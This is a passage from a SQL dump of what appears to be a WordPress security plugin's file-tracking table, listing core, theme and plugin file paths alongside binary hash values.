��X','\n�,���xb�9dk���QK�x�G�2���','',0,'?'),('M1��/�n��̖Q��','wp-includes/css/dist/components/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c��`=\"����y�)','�xp�3�>9eQ<�jCQ���g@M�/�w','',0,'?'),('M<�����h�s�a)�','wp-content/themes/event/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b!q�wҍ��\n��J²','��)�T��+�#-�֕�M�g��D���:���','',0,'?'),('M?,5�*�����K*�f','wp-admin/js/post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tm�{$,����','A�Y����}�U=��2��\'\Z�� �Z�0�<�','',0,'?'),('MHW�����7���','wp-content/themes/auberge/includes/plugins/advanced-custom-fields/advanced-custom-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tq���Cw�ŨWZ�','��W�{X���~����o�ZQl�E��B8�','',0,'?'),('MW� ���:��ي','wp-admin/images/align-none.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eqd2���u����\r','�g(�1�X�{� [].���T����A��','',0,'?'),('MY��G��\\tX����/','wp-includes/customize/class-wp-customize-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��S?��|��G','h �3|:Q9z���4Y1[�{^� $;�#�q��','',0,'?'),('Mj~����?Q���BU','wp-includes/wp-includes/images/uploader-icons-2x.png',0,'���&-��O��Õ�~','���&-��O��Õ�~','���r�\0����\'_>��6��QW��4ڠR��','',0,'?'),('Mpqi���Bi�\ne','wp-content/themes/newsmag/assets/vendors/fontawesome/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bF��ʎ�����vR{ ','rc��ݽ����\Z}�I�������r���','',0,'?'),('M|o;$d�Mr�#�','wp-content/themes/weblog/assets/js/weblog-custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���gv�w�[f� Ŝ�','Q�?�����퐲�a�������]H��\\n\nI','',0,'?'),('M�,�\\!z����|�y','wp-includes/wp-includes/theme-compat/header-embed.php',0,'Omz8��F����','Omz8��F����','�����})d!q ,@,��j��v ����E���','',0,'?'),('M�z���j\"=���T�','wp-includes/wp-includes/customize/class-wp-customize-background-image-setting.php',0,')�@�t��j23��W',')�@�t��j23��W','�4���0^+�u*�:ޓ4q[#��O��m�&�','',0,'?'),('M�[\Z�2hT� �K�','wp-content/plugins/wp-cerber/assets/flags/tr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<~Qk�dIr&��-!','�\"��i0�M��˩��VJc���]�3�\n��[','',0,'?'),('M�\r�-��A�<�S','wp-content/themes/storeone/template-parts/home-product-recent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�I� A�f�����V','���䖉Ņ�<�j�@Z�3�\\��cX�P(�}m�5','',0,'?'),('M�)����`�q[��','wp-content/themes/promote/inc/kirki/includes/class-kirki-active-callback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�: ��K��n֨8�B��','5��;�o�cU,Mw늀���>�uT��}/@]*�','',0,'?'),('Mǒ�tBz$aJ����','wp-content/themes/event/js/source/color-scheme-control.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TUDB%gAXi�ݸ�x�','#F۸�:}ݼ�b�;5��2�%O�ʎ�*','',0,'?'),('MР\0�A���9Q�+��','wp-includes/js/admin-bar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�၈��n�&�a1a\0','(L��<����K�i�-��U4�Wܸ` ��rl$�','',0,'?'),('M�;C�����8Yyﲏ','wp-includes/js/twemoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���װ�aL/S��T','e�dimԺm\Z$V��v�% ���FO��aK\rŇS','',0,'?'),('M�l}�^�Gi��*z','wp-includes/wp-includes/js/jquery/ui/effect-clip.js',0,']02[W�0V1�Q',']02[W�0V1�Q','�|�JR?�]ϭ̺\\T�v���� ��5t����$','',0,'?'),('M��w�M�f�0�b\\�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�+>����*�A��ř�','����{��Z�>�1k||�}P���C�TC��A','',0,'?'),('M���I�M��rD��-','wp-includes/post-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a^E�@�p�\'��?�','N�O�[wȐ�� ��&Ќ�!P��Qe��s','',0,'?'),('N7�A�\0�nnV�֑�','wp-content/plugins/wordfence/images/checkbox.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��G\r�6|\'','��y~`w(j�~�=뤼&��ݴ���Q>`^�x','',0,'?'),('N9Fm���9t/�+y���','wp-content/themes/event/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��@2���������','F?x瞽�nv��\r��9�ad��R��!{�\"Hy','',0,'?'),('N=�f�>$K���H�T�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����?�G{�����g','ĀР<W�;-\Z��(C+�,M���U��W6','',0,'?'),('N?u�z�x!�x�؉','wp-content/themes/kidzoo-lite/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I-Ynܸ�&d�p];��','���O^(�1�\rBҰ�����Eđܿ��A�U','',0,'?'),('NG�a:�Uf�Keu��I','wp-content/themes/sg-window/inc/css/customize.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�́�x\0{�#M�','�V_�0�U�Ts�ʫ�UT�Nn\r��9����','',0,'?'),('Nh�������\n�%','wp-content/themes/weblog/acmethemes/customizer/sanitize-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�t�T����h\"��','J�4��,Ģ��_��u�\'��K���Qʷ��,','',0,'?'),('Ni�~ �`���W�E','wp-content/plugins/wordfence/lib/wfAlerts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�(A��|�ϯy��L','�\'_�;?�|US5d}K/+,I!|��t','',0,'?'),('Nxa�߭�̿��(r�_','wp-content/plugins/all-in-one-wp-security-and-firewall/backups/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('N|�Jв�zn�sw','wp-includes/pluggable-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���\"�j��2�ߖ','��U����=����co��=t1�-\\�\r�=','',0,'?'),('N~���4E�����:y','wp-content/themes/cactus/assets/plugins/bootstrap/css/bootstrap.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�*\0�v�EM���','%�Ҵ p��{��^sD�@V�X�!�����]M','',0,'?'),('N���W[��@��t)�','wp-content/plugins/wordfence/css/iptraf.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�bf.��\n�V[�xPh','J��-@ ]�-�� �cq���WQ$8�','',0,'?'),('N�3�j@pu5����^��','wp-includes/js/tinymce/skins/wordpress/images/more.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\nm\0;�˫�z','$��v��o^���U� �A\0���:�\\C�u��','',0,'?'),('N��у�Ɉ�����&s','wp-content/themes/skt-pathway/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=V�|fU�Z����','��:Z^�d�?S���:�L[����i�/A���','',0,'?'),('N�Z<9��M��','wp-content/themes/event/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?��U��<�O�zsI','W8���/\ned�s��׆(]U��w�rź!','',0,'?'),('N�p�`�#bJ�Ȅ�','wp-includes/wp-includes/blocks/nextpage/block.json',0,'��{�~_کk_�l\n��','��{�~_کk_�l\n��','�vC.z-�N�Y��� �C�<����ccl','',0,'?'),('N����7�-��_','wp-includes/wp-includes/class-wp-customize-nav-menus.php',0,'B�8û�Td�h9�\Z','B�8û�Td�h9�\Z','��g�n\\�y|�TR�xF����\\��A��&7֏�d','',0,'?'),('N��HV����}�4G','wp-admin/css/customize-widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�\"?.�i�!�qe�o�','ߟ�d��~o�K�C��ѰE��˛)5��.9�A','',0,'?'),('N��ً�0�`�+�3d','wp-includes/wp-includes/ID3/module.audio-video.matroska.php',0,'^w�\'Z��Do4d].�','^w�\'Z��Do4d].�','bA�O����C���r5Y\0��se�A�ʏ0���','',0,'?'),('N��lI���V�,�Z�','wp-content/plugins/wp-cerber/assets/flags/hn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;Ҿ����:��','e��{9�[�۫�p��Nk83)t����$<5�','',0,'?'),('N�2�#��r�R�~� ','wp-includes/wp-includes/block-patterns/large-header.php',0,'�`���3��\0�]j6?>','�`���3��\0�]j6?>','��b�`&h�2��)V�KF}Ո�m�?*f�搭','',0,'?'),('N��a��e]�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3de{�h��|@��ձ','��BX����V�AӋ6�4���/Mk��f�','',0,'?'),('O ��S����#�Yi�v','wp-admin/includes/class-wp-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!T<zs�6�C�?r\r�','�hŽ�[��в�u�\0Jh=�$�6L)c^f��zb��','',0,'?'),('O�z��̟p*�\0','wp-includes/wp-includes/class-wp-block.php',0,'�ݕ��Fԯ�8f�6��','�ݕ��Fԯ�8f�6��','�����y{���tl+RJ���N��\nj�R','',0,'?'),('O�ҽPT�^�4~��B','wp-includes/css/dist/editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k����`�\0d���','�2��*Pj%R4{?��M�rH�:�����b�~','',0,'?'),('O =(�:��<� �1F�','wp-includes/class-wp-feed-cache-transient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��?^>��O�',':��;h�!xE�z��P+�dV�0����D�','',0,'?'),('O+���[�IB���m�m\'','wp-content/plugins/wordfence/images/wf-central-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�(��VѤ���','\0{\r�ߘ�J/� �^�+��,��S������','',0,'?'),('O/�s䣗�{��zZ�_7','wp-includes/wp-includes/js/mediaelement/mejs-controls.svg',0,'�^yq+�S%��y','�^yq+�S%��y','������h���A3L�:��\'1�ꁠ�\\�','',0,'?'),('O0��KQH���a�a��','wp-includes/wp-includes/js/dist/dom-ready.min.js',0,'w�I�k���o���^?\n�','w�I�k���o���^?\n�','��\0.����ɕ�`� �Ʃ��P���','',0,'?'),('O4�dzWQ�\0��R��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Lj���\"C�ix���','��x眪!����}�\Z�����W����d','',0,'?'),('O:�3?��g�:��','wp-content/themes/sg-window/genericons/genericons/Genericons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','→��(��7k�j','ɞ����1��X��*��*��y��h���s','',0,'?'),('O=om��,��a�@','wp-includes/wp-includes/css/media-views-rtl.css',0,'~��M]�1f�D,��>�','~��M]�1f�D,��>�','�mA �7N�/z}��;��e��r�cs�#sW','',0,'?'),('O=��h�\0}O��rL�b','wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�U��~�L5�@\ZVU','/�r��T�rm����G�с�\r�%�e\r��|�[','',0,'?'),('OJ�?�Cz�V�^2���1','wp-content/plugins/wp-cerber/assets/flags/mr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��Y��kF���@','���c���n�foaYd��M@�0O��DI\n��x','',0,'?'),('OS�Y�Wz!8�ʣj�','wp-content/plugins/wordfence/views/gdpr/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\atn}#��\r��','ÝE��F�@kh��V�b��w6��~�#kC','',0,'?'),('OT���;�h�FR|�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-maintenance-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;I�U`��t���',';�9�sM�lȴ[\ZZY��B�����{��Re','',0,'?'),('O^6�l\nf������˹','wp-content/themes/newsmag/inc/sidebars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ƬV�k�#�e�3~','��~�T�U�ry�n���p�g�!��Dc_=v�','',0,'?'),('OlqCcێ���������','wp-admin/css/forms-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�`�����kث=','g��<�������ƃ˂�s��{5Ϝq��6�','',0,'?'),('Oy�}Ma���_��I','wp-includes/Requests/Exception/HTTP/504.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�̪Db� ��*�','�<����!B�|$k���݈�# �e�i%0','',0,'?'),('O~r��&�Ur��&ۓ>','wp-content/themes/hueman/assets/front/js/lib/outline.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؿV��\rZ���ɗ','�h��X�?^r9r���va��e8e�1�s�fq','',0,'?'),('O�潼m$��&_','wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�F��\n�D��ҭ�','2\"�ޡ�4e���Kӗ�p!w#�����1���,','',0,'?'),('O�T��vyCˊX^��b','wp-includes/wp-includes/js/mce-view.js',0,'2s�H��ّ;[��� s','2s�H��ّ;[��� s','��8`9ڰn�-.� H�Dp��k+�γ��bI','',0,'?'),('O��\\���P5��{�R�','wp-admin/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9=�C���;��w^�X','�_\n�W����o�0w�����7��`=�r��','',0,'?'),('O�C�ŧ+�m��n��','wp-content/themes/travel-stories/font/Open-Sans-Bold/opensansbold.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','о��(\\�%��4ݶ6�y','^�q#�����|�(�!\n�a� e4f|� ���','',0,'?'),('O�[0{�ë ��/�¼','wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')e��f�#�`P�~7�n','-m��z��n�N�F�E\0ѭ\\vq�sL?�Z\Z��','',0,'?'),('O�c��Hߝ��z�x�','wp-content/themes/Endolf/aq_resizer.php',0,'H�{��x3��0k�\Z','H�{��x3��0k�\Z','�^��!��`\\���#���+��������u�','',0,'?'),('O����&�r�蓏�� ','wp-admin/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.\"�\Z���&T;�ݫ��','c�tg�H���u����L=?q�u���EA','',0,'?'),('O����R�r����D�?�','wp-admin/js/postbox.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���J��z%p','�qG%`�3E�:j~^�\ZҌ��;,��','',0,'?'),('O�� ���EW�f�n�','wp-content/themes/wp-barrister/library/js/jquery.cycle2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_,ڗ.��D�R�;�o','�=-��q|����k放3\\��y}rM��L','',0,'?'),('O�Q�^��B�E�Ӣ','wp-includes/wp-includes/ID3/module.audio.ogg.php',0,'�_2��\n$9��`m85','�_2��\n$9��`m85','�6%u?E�M��l�Ȑ�@5vr�[�j\'t�H��f','',0,'?'),('O�_��@���Q/fɷ','wp-content/themes/promote/inc/kirki/includes/output/class-kirki-output.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' g�N�y���/���~','1x���s�U6ּ8��}��-�=@P�f`*��','',0,'?'),('O�\Z�����<������','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�i�u��n�6���','k�\'��z���Lzm��\rg�gKj_r�e�i躞','',0,'?'),('O�&\0K�n�mo���O','wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.min.js',0,'�Er�HD��D��3��@','�Er�HD��D��3��@','<����o�@�:����-�Eg���)6^Ѽ\'��','',0,'?'),('O����y ��k b�','wp-admin/css/customize-nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lU�e�H�Y%U�n��','AK希T�YL�6��~8����w,9�ˉ+�R�f','',0,'?'),('O�����HI!K!0[�','wp-content/plugins/wordfence/lib/menu_scanner_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�����D�X�;�I','���C�&YB�p_d$�,+������Ŝ���J��','',0,'?'),('O�5e���;hz�w@�W','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z<����{~G�f(','��,ב[\Z���@�+���?x���P��А�','',0,'?'),('O��O�M_K7�n��','wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*5���^gG�o<NN','5�\'4ϣ�j3Ò�NjX�CU�!�����]~','',0,'?'),('O�hu�G���&\0�L�','wp-includes/Text/Diff/Engine/native.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S���\r��$�T','S��\04�v@�ű`�DG V�u�e�R��B竇3�','',0,'?'),('O��F���l��D끾G','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-multicheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z$���m$�,7^�a','��2dٓ�qѾQ0Xb��$�Ƴ5#��z��`','',0,'?'),('P��H��Z`�=���','wp-includes/blocks/pullquote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�1��ݗz��sK�c','v�K�N��`\ZX�n$`7P��Y6�~ON�1�','',0,'?'),('P�bw�=����i��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\Z��Iw5AlLۢ�','��K{�8��fl��7s�Rh���嗋��I','',0,'?'),('P �l���ߓ��R�Y','wp-includes/wp-includes/js/jquery/ui/sortable.min.js',0,'M��:�7)�r�ӈ�k','M��:�7)�r�ӈ�k',')��jjc�D�߰�%^B���� �&�ٶ�Ƀ�','',0,'?'),('P�/:��̮�҉���H','wp-content/plugins/wordfence/waf/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�З:4�z��M�E�7�','�!8�s���w�#�)��\r�<�r|2y*LS^','',0,'?'),('PE۫�7r|oI�6��>','wp-includes/js/backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`ft7\\J�*��4a','j�˯�}j�$��@�č��� n%Q|�l��','',0,'?'),('P ���NtD��n\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��!�,��^�q�','X߇p�Ք�Z��Љ�ֱo�\r�=˸<!�~�3�','',0,'?'),('P&_#�\'�zT���s','wp-includes/Requests/Exception/HTTP/417.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bpj�hO^�c\\G #','���L�T��Ҙ$xDs�^�h_!kC�\"1\'��_�','',0,'?'),('P\'�(���?+�z��$�','wp-admin/js/postbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$;�9H�S_��7���','��`���R���f!Rd�<����Q�� ��GIJ','',0,'?'),('P\'�s#+�#���\r^','wp-includes/wp-includes/blocks/subhead/block.json',0,'f�L[� ���3�','f�L[� ���3�','��DX�+C�]�D�$W+�f��yi><�\\�4��','',0,'?'),('P*h�`���q]_o�o','wp-content/themes/spidermag/assets/library/animate/js/wow.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+m�i1��ը��h��q�','>95��҂���@�S!�Z�1�,��A','',0,'?'),('P6��u��[tvJ�Y','wp-includes/wp-includes/js/customize-views.min.js',0,'�Hӷ�-\\Me���','�Hӷ�-\\Me���','�b����L��-���9wlo��y�$+�Y\Zޘ�N','',0,'?'),('P73o� ��\0�=��','wp-admin/js/word-count.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rffB)��������','��6j�,A�ުǭs�D��eC�z�&���\n���','',0,'?'),('PJ�~]��; ��`y','wp-includes/widgets/class-wp-widget-media-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dCa�*C^e~OriA�','�L�/�T|����w�pEf1�Ln��!y���','',0,'?'),('PK��2�I��)��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3[�h�k�da4�p','�&�!�7^�@��9���N�BT�����*8�','',0,'?'),('Ph<&(���\07�ßk','wp-content/themes/capacious/section-parts/section-team.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','med;�3\0�މ>E�','f�A礗�=�����j�LwS��=���\'?�?','',0,'?'),('Py/bj[�4��V���e','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-number.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�*@#gd}�?�b','�c�j�.\n�g�~�G���ŏDz�`n�=','',0,'?'),('P��[�D�XP��a���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;u�S���l','�M>:\r�&�V��`�\Z:�O0�Sv;\0��V�w','',0,'?'),('P��iz�t�a�}�a','wp-admin/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z\\���@�ju��W�=','�%Z��j��\Za��� ��Dy��b����','',0,'?'),('P�3V�R-��*MR}�','wp-content/themes/spidermag/assets/library/bootstrap/css/bootstrap.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �l���rA{��� ','��iG�\Z�=LB!|�~z��6 ��RA�','',0,'?'),('P�-�)\041��]���','wp-includes/wp-includes/js/dist/i18n.min.js',0,'pMp�s�Rӷ_�_','pMp�s�Rӷ_�_','+��d8/�]��jB���2?��q�����N','',0,'?'),('P��\n�e���u�\"�','wp-includes/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��B�c��f4�[�\\','\'�{~���V�A(�p�X���ȵ�E/�','',0,'?'),('P��y����Xn��','wp-content/plugins/wp-cerber/assets/flags/an.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B����\ZEs�F\r�8','���Z��iLz�q`�{ۯۇn �fN�zY3i�','',0,'?'),('P�a�l&��:�)V�I�','wp-content/plugins/wp-cerber/assets/flags/ax.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l���ho��%>��T�','Ku*Q(�g�iC�`i0�����ȇ�R.�c���','',0,'?'),('P�@���;b<\n�c�','wp-includes/class-wp-oembed-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\";�r��\Z(FAU','�p���[����j$8�7�zI\\�!y�<G�4\r���','',0,'?'),('P�M�\Z�I̸�ݭY`r','wp-content/plugins/wordfence/lib/wfHelperString.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Euƻ\\S w?,�_�L`','��� ��i�Lƛw���6�_���,n�2S��Zh)','',0,'?'),('P�0{����ֱm#','wp-includes/wp-includes/css/dist/block-directory/style-rtl.min.css',0,'\n��J�cW�&��Y�','\n��J�cW�&��Y�','i�+W�M�E4�\n�#S�-^�?�ݻ��,�9','',0,'?'),('P�1$���\\*�C','wp-admin/images/stars-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A���#�S�Me.^','[��耿�_(\rh���Y���T��qZ��','',0,'?'),('P��0��a��R�z= ','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�gkeͿݾ���|�h','�H��zj鞨%�����p=�Z��iNA�Z�','',0,'?'),('P�-���6��@�p~�','wp-content/themes/auberge/template-parts/content-post-condensed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���yY��~��vVY\'\\','\\��]�hX�´��[b��O�nf��]J�','',0,'?'),('P��G2�R5[�P�p�','wp-content/themes/pine/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Լ��,@�c^�','�*t��b��E_�_�$�B�J�4Z8��m�/�','',0,'?'),('P��/ն�؉N��\r7k','wp-includes/wp-includes/random_compat/random_int.php',0,'*�RX�Ǡ�ͤB�n6','*�RX�Ǡ�ͤB�n6','8�-%���s�`N��a�L �L�M�ʫ�)�','',0,'?'),('Q\r�1J&\"Q������:','wp-content/themes/advance/js/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�9z�dM@�\rj','��;~����E�#G�E�U���;tE�,����̹','',0,'?'),('Q6iY�ꩱ�jXZL','wp-content/themes/promote/inc/kirki/includes/class-kirki-explode-background-field.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�P^�O�\'��zf��n','dD@w��C��v��ELgR��_��TF�?DWu','',0,'?'),('Q;���(����Mp*�','wp-admin/js/widgets/media-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PQ�{���97@�]տ','PP&`@�U��}�{�������_V��,HCV','',0,'?'),('Q= Q\'�1�S1�ϙ','wp-content/themes/cactus/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ECxG�&]�����D','�E�X�;������R��ô�H��I��','',0,'?'),('QJ���s3�R�aU*�s','wp-content/themes/twentynineteen/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���հ&��Tgs\r','0�ed ��s��X������Q8���3�Z��','',0,'?'),('QM9�K7�ܑlG��','wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',0,'R�*L�TG��4%P���','R�*L�TG��4%P���','-������n�F�J�&T�P�o\\ϓ\\����2���','',0,'?'),('QT���*�f�P��.�','wp-admin/includes/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Հѷ������#','+B�0j$2f�j�i�\Z���)HٗO=�\\%�','',0,'?'),('QY��1�Tl��Vr<','wp-includes/js/customize-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"r�<`����D��','b2�M��!o�;�-�veq��\\f�]l����:','',0,'?'),('QuoPX��\0��Sڞ','wp-admin/images/bubble_bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�g<ć�I����0','\'+u�W�`-A�����S\'�}S~S��b���','',0,'?'),('Qwa��t%F�%2��','wp-content/themes/twentytwenty/templates/template-full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[6i\"Y|���f8K','Hh�E�.P�ڬ�.��M��eMo�@\0��W�','',0,'?'),('Qzvp�-�~�D\"X{�','wp-content/themes/maxbusiness/inc/sanitize-cb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v)w!Le�<�S�<3��','��$�TYl\r,33�?�]\n��kJ�i���','',0,'?'),('Q��cm�uX\Z3�B+��X','wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VD�\'\'���C��b�x','fkYQ@Y�^,\n�?�J�Y���\0�C�ł��','',0,'?'),('Q����\n�L����\'�','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-spacing-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�FR�ǘ���R�.M','���Y`^��j���4�8���[R���K}2��','',0,'?'),('Q�6�������M��V�','wp-content/themes/Kent/FT/license-html.php',0,'��� �,��ۓ��X��H','��� �,��ۓ��X��H','����Y��XjМ�������%,�]���&k��','',0,'?'),('Q�ՔY�k��`4��E�','wp-includes/wp-includes/js/jquery/jquery.hotkeys.min.js',0,'�S!}EU�\\b�g�h��=','�S!}EU�\\b�g�h��=','\ZJ��]�x ծT���c�0n�9 +V�k�','',0,'?'),('Q�t��$oGoE�$�:�','wp-content/plugins/wp-cerber/assets/flags/sy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oi�&\0�0$l6��','�/<7�\n�W�6�H~�G�K 